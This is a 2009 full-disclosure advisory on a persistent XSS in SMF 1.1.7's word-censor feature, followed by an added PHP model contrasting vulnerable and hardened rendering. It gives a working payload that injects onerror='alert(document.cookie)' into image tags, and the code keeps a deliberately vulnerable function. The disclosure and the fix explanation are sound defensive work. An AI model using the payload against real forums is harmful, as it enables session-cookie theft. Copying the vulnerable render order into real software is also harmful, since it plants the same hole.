Computer Security
[EN] securityvulns.ru
From: Eduardo Vela <sirdarckcat_(at)_gmail.com>
Date: 05.02.2009
Subject: SMF 1.1.7 Persistent XSS (requires permission to edit censor)

SMF 1.1.7 (simplemachines.org) XSS

Exploitation:

If you can modify the censor on an SMF forum, then you can make it
execute arbitrary JS code.
http://SMF.Forum.com/index.php?action=postsettings;sa=censor

Just add the following entry:
http://www.test.xss/ => http://www.test-xss/" onerror="alert(document.cookie)

And then write a post, modify your signature, or send a PM with the code:
[img]http://www.test.xss/[/img]

And the HTML code generated will be..
<img src="http://www.test-xss/" onerror="alert(document.cookie)"
alt="" border="0" />

Notes:
- SMF is not using httpOnly cookies.
- I'm going full disclosure with this because I've had bad
experiences with the SMF team when reporting vulnerabilities..

Greetings!!
-- Eduardo
http://www.sirdarckcat.net/
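
The following is an added example, not part of the original post and not SMF source code. It is a simplified model that assumes the censor substitution is applied to already-built HTML without being escaped, and contrasts that with censoring the raw text before escaping; all function and constant names are hypothetical.

```php
<?php
// Simplified model of the rendering flaw; not SMF source. All names are hypothetical.
const IMG_TAG = '~\[img\](https?://[^\s\[\]]+)\[/img\]~i';
const IMG_HTML = '<img src="$1" alt="" border="0" />';

// Constructed censor table holding the entry from the advisory.
$censor = [
    'http://www.test.xss/' => 'http://www.test-xss/" onerror="alert(document.cookie)',
];

// Replace each censored string with its configured substitute.
function apply_censor(string $text, array $censor): string
{
    return str_replace(array_keys($censor), array_values($censor), $text);
}

// Weak order: escape, build the <img> markup, then censor the finished HTML.
// The substitute is never escaped, so its double quote closes src="...".
function render_vulnerable(string $post, array $censor): string
{
    $html = preg_replace(IMG_TAG, IMG_HTML, htmlspecialchars($post, ENT_QUOTES, 'UTF-8'));
    return apply_censor($html, $censor);
}

// Hardened order: censor the raw text first, then escape everything, then
// build markup. The substitute is escaped like any other user-visible text.
function render_hardened(string $post, array $censor): string
{
    $safe = htmlspecialchars(apply_censor($post, $censor), ENT_QUOTES, 'UTF-8');
    return preg_replace(IMG_TAG, IMG_HTML, $safe);
}

// Constructed sample post, taken from the advisory text.
$post = '[img]http://www.test.xss/[/img]';
echo render_vulnerable($post, $censor), PHP_EOL;
echo render_hardened($post, $censor), PHP_EOL;
```

Marking the session cookie HttpOnly, which the notes say SMF does not do, would keep it out of document.cookie but would not remove the injection itself.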
